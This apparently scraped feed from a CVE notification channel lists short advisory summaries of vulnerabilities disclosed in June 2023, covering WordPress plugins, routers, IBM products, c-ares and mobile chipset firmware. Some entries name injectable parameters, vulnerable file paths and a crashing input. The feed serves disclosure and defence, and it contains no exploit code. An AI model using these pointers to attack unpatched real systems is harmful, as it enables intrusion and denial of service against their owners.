🚨 CVE-2023-33660A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function copyn_str() in the file mqtt_parser.c. An attacker could exploit this vulnerability to cause a denial of service attack.🎖@cveNotify |
|
| 2023-06-08 10:58:14 |
🚨 CVE-2023-0976A command Injection Vulnerability in TA for mac-OS prior to version 5.7.9 allows local users to place an arbitrary file into the /Library/Trellix/Agent/bin/ folder. The malicious file is executed by running the TA deployment feature located in the System Tree. 🎖@cveNotify |
|
| 2023-06-08 06:58:21 |
🚨 CVE-2023-33846IBM TXSeries for Multiplatforms 8.1, 8.2, 9.1, CICS TX Standard, 11.1, CICS TX Advanced 10.1, and 11.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 257100.🎖@cveNotify |
|
| 2023-06-08 06:58:15 |
🚨 CVE-2023-33847IBM TXSeries for Multiplatforms 8.1, 8.2, 9.1, CICS TX Standard, 11.1, CICS TX Advanced 10.1, and 11.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 257102.🎖@cveNotify |
|
| 2023-06-08 06:58:14 |
🚨 CVE-2023-23482IBM Sterling Partner Engagement Manager 6.1, 6.2, and 6.2.1 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 245891.🎖@cveNotify |
|
| 2023-06-08 06:58:13 |
🚨 CVE-2023-2986The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, which users are typically customers.🎖@cveNotify |
|
| 2023-06-08 00:58:19 |
🚨 CVE-2023-24476An attacker with local access to the machine could record the traffic, which could allow them to resend requests without the server authenticating that the user or session are valid.🎖@cveNotify |
|
| 2023-06-08 00:58:18 |
🚨 CVE-2023-29152By changing the filename parameter in the request, an attacker could delete any file with the permissions of the Vuforia server account.🎖@cveNotify |
|
| 2023-06-08 00:58:17 |
🚨 CVE-2023-29168The local Vuforia web application does not support HTTPS, and federated credentials are passed via basic authentication.🎖@cveNotify |
|
| 2023-06-08 00:58:14 |
🚨 CVE-2023-29502Before importing a project into Vuforia, a user could modify the “resourceDirectory” attribute in the appConfig.json file to be a different path.🎖@cveNotify |
|
| 2023-06-08 00:58:13 |
🚨 CVE-2023-31200PTC Vuforia Studio does not require a token; this could allow an attacker with local access to perform a cross-site request forgery attack or a replay attack.🎖@cveNotify |
|
| 2023-06-08 00:58:12 |
🚨 CVE-2023-24329An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.🎖@cveNotify |
|
| 2023-06-07 22:58:30 |
🚨 CVE-2023-25177Delta Electronics' CNCSoft-B DOPSoft versions 1.0.0.4 and prior are vulnerable to stack-based buffer overflow, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-06-07 22:58:29 |
🚨 CVE-2023-3060A vulnerability has been found in code-projects Agro-School Management System 1.0 and classified as problematic. This vulnerability affects the function doAddQuestion of the file btn_functions.php. The manipulation of the argument Question leads to cross site scripting. The attack can be initiated remotely. VDB-230566 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-07 22:58:28 |
🚨 CVE-2023-3061A vulnerability was found in code-projects Agro-School Management System 1.0 and classified as critical. This issue affects some unknown processing of the file btn_functions.php of the component Attachment Image Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-230567.🎖@cveNotify |
|
| 2023-06-07 22:58:25 |
🚨 CVE-2023-3062A vulnerability was found in code-projects Agro-School Management System 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument password leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-230568.🎖@cveNotify |
|
| 2023-06-07 22:58:24 |
🚨 CVE-2022-35750Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-07 22:58:23 |
🚨 CVE-2022-35752Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-07 22:58:19 |
🚨 CVE-2023-33284Marval MSM through 14.19.0.12476 and 15.0 has a Remote Code Execution vulnerability. A remote attacker authenticated as any user is able to execute code in context of the web server.🎖@cveNotify |
|
| 2023-06-07 22:58:18 |
🚨 CVE-2023-33282Marval MSM through 14.19.0.12476 and 15.0 has a System account with default credentials. A remote attacker is able to login and create a valid session. This makes it possible to make backend calls to endpoints in the application.🎖@cveNotify |
|
| 2023-06-07 22:58:17 |
🚨 CVE-2023-33595CPython v3.12.0 alpha 7 was discovered to contain a heap use-after-free via the function ascii_decode at /Objects/unicodeobject.c.🎖@cveNotify |
|
| 2023-06-07 22:58:13 |
🚨 CVE-2023-33863RenderDoc through 1.26 allows an Integer Overflow with a resultant Buffer Overflow (issue 1 of 2).🎖@cveNotify |
|
| 2023-06-07 22:58:12 |
🚨 CVE-2023-33865RenderDoc through 1.26 allows local privilege escalation via a symlink attack.🎖@cveNotify |
|
| 2023-06-07 22:58:11 |
🚨 CVE-2023-34237SABnzbd is an open source automated Usenet download tool. A design flaw was discovered in SABnzbd that could allow remote code execution. Manipulating the Parameters setting in the Notification Script functionality allows code execution with the privileges of the SABnzbd process. Exploiting the vulnerabilities requires access to the web interface. Remote exploitation is possible if users[exposed their setup to the internet or other untrusted networks without setting a username/password. By default SABnzbd is only accessible from `localhost`, with no authentication required for the web interface. This issue has been patched in commits `e3a722` and `422b4f` which have been included in the 4.0.2 release. Users are advised to upgrade. Users unable to upgrade should ensure that a username and password have been set if their instance is web accessible.🎖@cveNotify |
|
| 2023-06-07 21:58:24 |
🚨 CVE-2023-34109zxcvbn-ts is an open source password strength estimator written in typescript. This vulnerability affects users running on the nodeJS platform which are using the second argument of the zxcvbn function. It can result in an unbounded resource consumption as the user inputs array is extended with every function call. Browsers are impacted, too but a single user need to do a lot of input changes so that it affects the browser, while the node process gets the inputs of every user of a platform and can be killed that way. This problem has been patched in version 3.0.2. Users are advised to upgrade. Users unable to upgrade should stop using the second argument of the zxcvbn function and use the zxcvbnOptions.setOptions function.🎖@cveNotify |
|
| 2023-06-07 21:58:23 |
🚨 CVE-2023-3150A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file posts\manage_post.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231019.🎖@cveNotify |
|
| 2023-06-07 21:58:22 |
🚨 CVE-2023-3151A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file user\manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231020.🎖@cveNotify |
|
| 2023-06-07 21:58:19 |
🚨 CVE-2023-3152A vulnerability classified as critical has been found in SourceCodester Online Discussion Forum Site 1.0. This affects an unknown part of the file admin\posts\view_post.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-07 21:58:18 |
🚨 CVE-2023-27350This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.🎖@cveNotify |
|
| 2023-06-07 21:58:17 |
🚨 CVE-2023-33718mp4v2 v2.1.3 was discovered to contain a memory leak via MP4File::ReadString() at mp4file_io.cpp🎖@cveNotify |
|
| 2023-06-07 18:58:17 |
🚨 CVE-2023-29742An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a code execution attack by manipulating the database.🎖@cveNotify |
|
| 2023-06-07 18:58:13 |
🚨 CVE-2022-35748HTTP.sys Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-07 18:58:12 |
🚨 CVE-2023-3147A vulnerability has been found in SourceCodester Online Discussion Forum Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin\categories\view_category.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231016.🎖@cveNotify |
|
| 2023-06-07 16:58:14 |
🚨 CVE-2020-36728The Adning Advertising plugin for WordPress is vulnerable to file deletion via path traversal in versions up to, and including, 1.5.5. This allows unauthenticated attackers to delete arbitrary files which can be used to reset and gain full control of a site.🎖@cveNotify |
|
| 2023-06-07 16:58:13 |
🚨 CVE-2021-4380The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.🎖@cveNotify |
|
| 2023-06-07 14:58:17 |
🚨 CVE-2020-36728The Adning Advertising plugin for WordPress is vulnerable to file deletion via path traversal in versions up to, and including, 1.5.5. This allows unauthenticated attackers to delete arbitrary files which can be used to reset and gain full control of a site.🎖@cveNotify |
|
| 2023-06-07 14:58:16 |
🚨 CVE-2023-30758Cross-site scripting vulnerability in Pleasanter 1.3.38.1 and earlier allows a remote authenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-06-07 14:58:15 |
🚨 CVE-2023-3059A vulnerability, which was classified as critical, was found in SourceCodester Online Exam Form Submission 1.0. This affects an unknown part of the file /admin/update_s6.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230565 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-07 12:58:14 |
🚨 CVE-2023-3140Missing HTTP headers (X-Frame-Options, Content-Security-Policy) in KNIME Business Hub before 1.4.0 has left users vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such as a button or link, to another server in which they have an identical webpage. The attacker essentially hijacks the user activity intended for the original server and sends them to the other server.🎖@cveNotify |
|
| 2023-06-07 12:58:13 |
🚨 CVE-2023-31130c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.🎖@cveNotify |
|
| 2023-06-07 12:58:12 |
🚨 CVE-2023-32067c-ares is an asynchronous resolver library. c-ares is vulnerable to denial of service. If a target resolver sends a query, the attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver. The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. This issue has been patched in version 1.19.1.🎖@cveNotify |
|
| 2023-06-07 05:58:37 |
🚨 CVE-2023-33782D-Link DIR-842V2 v1.0.3 was discovered to contain a command injection vulnerability via the iperf3 diagnostics function.🎖@cveNotify |
|
| 2023-06-07 05:58:36 |
🚨 CVE-2022-25834In Percona XtraBackup (PXB) through 2.2.24 and 3.x through 8.0.27-19, a crafted filename on the local file system could trigger unexpected command shell execution of arbitrary commands.🎖@cveNotify |
|
| 2023-06-07 05:58:35 |
🚨 CVE-2023-33781An issue in D-Link DIR-842V2 v1.0.3 allows attackers to execute arbitrary commands via importing a crafted file.🎖@cveNotify |
|
| 2023-06-07 05:58:34 |
🚨 CVE-2019-25141The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.🎖@cveNotify |
|
| 2023-06-07 05:58:30 |
🚨 CVE-2019-25140The WordPress Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the logo_width, logo_height, rcsp_logo_url, home_sec_link_txt, rcsp_headline and rcsp_description parameters in versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-07 05:58:29 |
🚨 CVE-2019-25143The GDPR Cookie Compliance plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the gdpr_cookie_compliance_reset_settings AJAX action in versions up to, and including, 4.0.2. This makes it possible for authenticated attackers to reset all of the settings.🎖@cveNotify |
|
| 2023-06-07 05:58:28 |
🚨 CVE-2019-25151The Funnel Builder plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the activate_plugin function in versions up to, and including, 1.3.0. This makes it possible for authenticated attackers to activate any plugin on the vulnerable service.🎖@cveNotify |
|
| 2023-06-07 05:58:27 |
🚨 CVE-2019-25146The DELUCKS SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the saveSettings() function that had no capability checks in versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever a victim accesses the page.🎖@cveNotify |
|
| 2023-06-07 05:58:23 |
🚨 CVE-2020-36702The Ultimate Addons for Gutenberg plugin for WordPress is vulnerable to Authenticated Settings Change in versions up to, and including, 1.14.7. This is due to missing capability checks on several AJAX actions. This makes it possible for authenticated attackers with subscriber+ roles to update the plugin's settings.🎖@cveNotify |
|
| 2023-06-07 05:58:22 |
🚨 CVE-2019-25142The Mesmerize & Materialis themes for WordPress are vulnerable to authenticated options change in versions up to, and including,1.6.89 (Mesmerize) and 1.0.172 (Materialis). This is due to 'companion_disable_popup' function only checking the nonce while sending user input to the 'update_option' function. This makes it possible for authenticated attackers to change otherwise restricted options.🎖@cveNotify |
|
| 2023-06-07 05:58:21 |
🚨 CVE-2020-36704The Fruitful Theme for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters stored via the fruitful_theme_options_action AJAX action in versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-07 05:58:18 |
🚨 CVE-2020-36696The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the handle_downloads() function in versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to download files from the vulnerable service.🎖@cveNotify |
|
| 2023-06-07 05:58:17 |
🚨 CVE-2019-25147The Pretty Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via various IP headers as well as the referer header in versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping in the track_link function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-07 05:58:16 |
🚨 CVE-2020-36710The WPS Hide Login plugin for WordPress is vulnerable to login page disclosure even when the settings of the plugin are set to hide the login page making it possible for unauthenticated attackers to brute force credentials on sites in versions up to, and including, 1.5.4.2.🎖@cveNotify |
|
| 2023-06-07 01:58:16 |
🚨 CVE-2022-46703A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-06-07 01:58:15 |
🚨 CVE-2022-46705A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, Safari 16.2. Visiting a malicious website may lead to address bar spoofing.🎖@cveNotify |
|
| 2023-06-07 01:58:14 |
🚨 CVE-2022-42855A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2. An app may be able to use arbitrary entitlements.🎖@cveNotify |
|
| 2023-06-06 23:58:28 |
🚨 CVE-2023-2952XRA dissector infinite loop in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-06 23:58:27 |
🚨 CVE-2023-1621An issue has been discovered in GitLab EE affecting all versions starting from 12.0 before 15.10.5, all versions starting from 15.11 before 15.11.1. A malicious group member may continue to commit to projects even from a restricted IP address.🎖@cveNotify |
|
| 2023-06-06 23:58:26 |
🚨 CVE-2023-29632PrestaShop jmspagebuilder 3.x is vulnerable to SQL Injection via ajax_jmspagebuilder.php.🎖@cveNotify |
|
| 2023-06-06 23:58:25 |
🚨 CVE-2023-2157A heap-based buffer overflow vulnerability was found in the ImageMagick package that can lead to the application crashing.🎖@cveNotify |
|
| 2023-06-06 23:58:23 |
🚨 CVE-2023-2253A flaw was found in the `/v2/_catalog` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: `n`). This vulnerability allows a malicious user to submit an unreasonably large value for `n,` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.🎖@cveNotify |
|
| 2023-06-06 23:58:22 |
🚨 CVE-2023-2602A vulnerability was found in the pthread_create() function in libcap. This issue may allow a malicious actor to use cause __real_pthread_create() to return an error, which can exhaust the process memory.🎖@cveNotify |
|
| 2023-06-06 23:58:21 |
🚨 CVE-2023-2603A vulnerability was found in libcap. This issue occurs in the _libcap_strdup() function and can lead to an integer overflow if the input string is close to 4GiB.🎖@cveNotify |
|
| 2023-06-06 23:58:20 |
🚨 CVE-2023-2961A segmentation fault flaw was found in the Advancecomp package. This may lead to decreased availability.🎖@cveNotify |
|
| 2023-06-06 23:58:19 |
🚨 CVE-2023-33477In Harmonic NSG 9000-6G devices, an authenticated remote user can obtain source code by directly requesting a special path.🎖@cveNotify |
|
| 2023-06-06 23:58:18 |
🚨 CVE-2023-33569Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via ip/eval/ajax.php?action=update_user.🎖@cveNotify |
|
| 2023-06-06 23:58:17 |
🚨 CVE-2023-33684Weak session management in DB Elettronica Telecomunicazioni SpA SFT DAB 600/C Firmware: 1.9.3 Bios firmware: 7.1 (Apr 19 2021) Gui: 2.46 FPGA: 169.55 uc: 6.15 allows attackers on the same network to bypass authentication by re-using the IP address assigned to the device by the NAT protocol.🎖@cveNotify |
|
| 2023-06-06 23:58:16 |
🚨 CVE-2023-34409In Percona Monitoring and Management (PMM) server 2.x before 2.37.1, the authenticate function in auth_server.go does not properly formalize and sanitize URL paths to reject path traversal attempts. This allows an unauthenticated remote user, when a crafted POST request is made against unauthenticated API routes, to access otherwise protected API routes leading to escalation of privileges and information disclosure.🎖@cveNotify |
|
| 2023-06-06 23:58:14 |
🚨 CVE-2023-1204An issue has been discovered in GitLab CE/EE affecting all versions starting from 10.1 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. A user could use an unverified email as a public email and commit email by sending a specifically crafted request on user update settings.🎖@cveNotify |
|
| 2023-06-06 23:58:13 |
🚨 CVE-2015-10108A vulnerability was found in meitar Inline Google Spreadsheet Viewer Plugin up to 0.9.6 on WordPress and classified as problematic. Affected by this issue is the function displayShortcode of the file inline-gdocs-viewer.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 0.9.6.1 is able to address this issue. The name of the patch is 2a8057df8ca30adc859cecbe5cad21ac28c5b747. It is recommended to upgrade the affected component. VDB-230234 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-06 20:58:31 |
🚨 CVE-2023-29084Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.🎖@cveNotify |
|
| 2023-06-06 20:58:30 |
🚨 CVE-2010-4605Unspecified vulnerability in the backup-archive client in IBM Tivoli Storage Manager (TSM) 5.3.x before 5.3.6.10, 5.4.x before 5.4.3.4, 5.5.x before 5.5.3, 6.1.x before 6.1.4, and 6.2.x before 6.2.2 on Unix and Linux allows local users to overwrite arbitrary files via unknown vectors.🎖@cveNotify |
|
| 2023-06-06 20:58:28 |
🚨 CVE-2023-31548A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-06-06 20:58:27 |
🚨 CVE-2018-20967The wp-ultimate-csv-importer plugin before 5.6.1 for WordPress has CSRF.🎖@cveNotify |
|
| 2023-06-06 20:58:26 |
🚨 CVE-2015-9306The wp-ultimate-csv-importer plugin before 3.8.1 for WordPress has XSS.🎖@cveNotify |
|
| 2023-06-06 20:58:25 |
🚨 CVE-2020-36694An issue was discovered in netfilter in the Linux kernel before 5.10. There can be a use-after-free in the packet processing context, because the per-CPU sequence count is mishandled during concurrent iptables rules replacement. This could be exploited with the CAP_NET_ADMIN capability in an unprivileged namespace. NOTE: cc00bca was reverted in 5.12.🎖@cveNotify |
|
| 2023-06-06 20:58:23 |
🚨 CVE-2023-32281The affected application lacks proper validation of user-supplied data when parsing project files (e.g., CSP). This could lead to an out-of-bounds read in the FontManager. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process. 🎖@cveNotify |
|
| 2023-06-06 20:58:22 |
🚨 CVE-2023-31569TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain a command injection via the setWanCfg function.🎖@cveNotify |
|
| 2023-06-06 20:58:20 |
🚨 CVE-2023-33457In Sogou Workflow v0.10.6, memcpy a negtive size in URIParser::parse , may cause buffer-overflow and crash.🎖@cveNotify |
|
| 2023-06-06 20:58:18 |
🚨 CVE-2023-33532There is a command injection vulnerability in the Netgear R6250 router with Firmware Version 1.0.4.48. If an attacker gains web management privileges, they can inject commands into the post request parameters, thereby gaining shell privileges.🎖@cveNotify |
|
| 2023-06-06 20:58:17 |
🚨 CVE-2023-33533Netgear D6220 with Firmware Version 1.0.0.80, D8500 with Firmware Version 1.0.3.60, R6700 with Firmware Version 1.0.2.26, and R6900 with Firmware Version 1.0.2.26 are vulnerable to Command Injection. If an attacker gains web management privileges, they can inject commands into the post request parameters, gaining shell privileges.🎖@cveNotify |
|
| 2023-06-06 20:58:16 |
🚨 CVE-2023-30948A security defect in Foundry's Comments functionality resulted in the retrieval of attachments to comments not being gated by additional authorization checks. This could enable an authenticated user to inject a prior discovered attachment UUID into other arbitrary comments to discover it's content.This defect was fixed in Foundry Comments 2.249.0, and a patch was rolled out to affected Foundry environments. No further intervention is required at this time.🎖@cveNotify |
|
| 2023-06-06 18:58:13 |
🚨 CVE-2023-2434The Nested Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'reset' function in versions up to, and including, 3.2.3. This makes it possible for authenticated attackers, with editor-level permissions and above, to reset plugin settings.🎖@cveNotify |
|
| 2023-06-06 18:58:12 |
🚨 CVE-2023-31184ROZCOM client CWE-798: Use of Hard-coded Credentials🎖@cveNotify |
|
| 2023-06-06 15:58:48 |
🚨 CVE-2023-20715In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07796900; Issue ID: ALPS07796900.🎖@cveNotify |
|
| 2023-06-06 15:58:47 |
🚨 CVE-2023-20725In preloader, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07734004 / ALPS07874358 (For MT6880, MT6890, MT6980, MT6990 only); Issue ID: ALPS07734004 / ALPS07874358 (For MT6880, MT6890, MT6980, MT6990 only).🎖@cveNotify |
|
| 2023-06-06 15:58:46 |
🚨 CVE-2023-20728In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573603; Issue ID: ALPS07573603.🎖@cveNotify |
|
| 2023-06-06 15:58:45 |
🚨 CVE-2023-20723In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07843845; Issue ID: ALPS07843845.🎖@cveNotify |
|
| 2023-06-06 15:58:41 |
🚨 CVE-2023-20730In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573552; Issue ID: ALPS07573552.🎖@cveNotify |
|
| 2023-06-06 15:58:40 |
🚨 CVE-2023-20731In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573495; Issue ID: ALPS07573495.🎖@cveNotify |
|
| 2023-06-06 15:58:39 |
🚨 CVE-2023-20729In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573552; Issue ID: ALPS07573575.🎖@cveNotify |
|
| 2023-06-06 15:58:35 |
🚨 CVE-2023-20732In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573480; Issue ID: ALPS07573480.🎖@cveNotify |
|
| 2023-06-06 15:58:34 |
🚨 CVE-2023-20735In vcu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07645149; Issue ID: ALPS07645178.🎖@cveNotify |
|
| 2023-06-06 15:58:33 |
🚨 CVE-2023-20736In vcu, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07645149; Issue ID: ALPS07645189.🎖@cveNotify |
|
| 2023-06-06 15:58:30 |
🚨 CVE-2023-20737In vcu, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07645149; Issue ID: ALPS07645167.🎖@cveNotify |
|
| 2023-06-06 15:58:29 |
🚨 CVE-2023-20739In vcu, there is a possible memory corruption due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07559819; Issue ID: ALPS07559819.🎖@cveNotify |
|
| 2023-06-06 15:58:28 |
🚨 CVE-2023-20741In ril, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628591; Issue ID: ALPS07628606.🎖@cveNotify |
|
| 2023-06-06 13:58:16 |
🚨 CVE-2023-3120A vulnerability, which was classified as critical, was found in SourceCodester Service Provider Management System 1.0. This affects an unknown part of the file view_service.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230799.🎖@cveNotify |
|
| 2023-06-06 13:58:15 |
🚨 CVE-2023-3121A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-06 13:58:14 |
🚨 CVE-2023-2833The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update.🎖@cveNotify |
|
| 2023-06-06 13:58:13 |
🚨 CVE-2020-8908A temp directory creation vulnerability exists in all versions of Guava, allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava API com.google.common.io.Files.createTempDir(). By default, on unix-like systems, the created directory is world-readable (readable by an attacker with access to the system). The method in question has been marked @Deprecated in versions 30.0 and later and should not be used. For Android developers, we recommend choosing a temporary directory API provided by Android, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.🎖@cveNotify |
|
| 2023-06-06 10:58:33 |
🚨 CVE-2022-40522Memory corruption in Linux Networking due to double free while handling a hyp-assign.🎖@cveNotify |
|
| 2023-06-06 10:58:32 |
🚨 CVE-2022-40523Information disclosure in Kernel due to indirect branch misprediction.🎖@cveNotify |
|
| 2023-06-06 10:58:31 |
🚨 CVE-2022-40525Information disclosure in Linux Networking Firmware due to unauthorized information leak during side channel analysis.🎖@cveNotify |
|
| 2023-06-06 10:58:27 |
🚨 CVE-2022-33227Memory corruption in Linux android due to double free while calling unregister provider after register call.🎖@cveNotify |
|
| 2023-06-06 10:58:26 |
🚨 CVE-2022-33230Memory corruption in FM Host due to buffer copy without checking the size of input in FM Host🎖@cveNotify |
|
| 2023-06-06 10:58:25 |
🚨 CVE-2022-40533Transient DOS due to untrusted Pointer Dereference in core while sending USB QMI request.🎖@cveNotify |
|
| 2023-06-06 10:58:24 |
🚨 CVE-2022-33240Memory corruption in Audio due to incorrect type cast during audio use-cases.🎖@cveNotify |
|
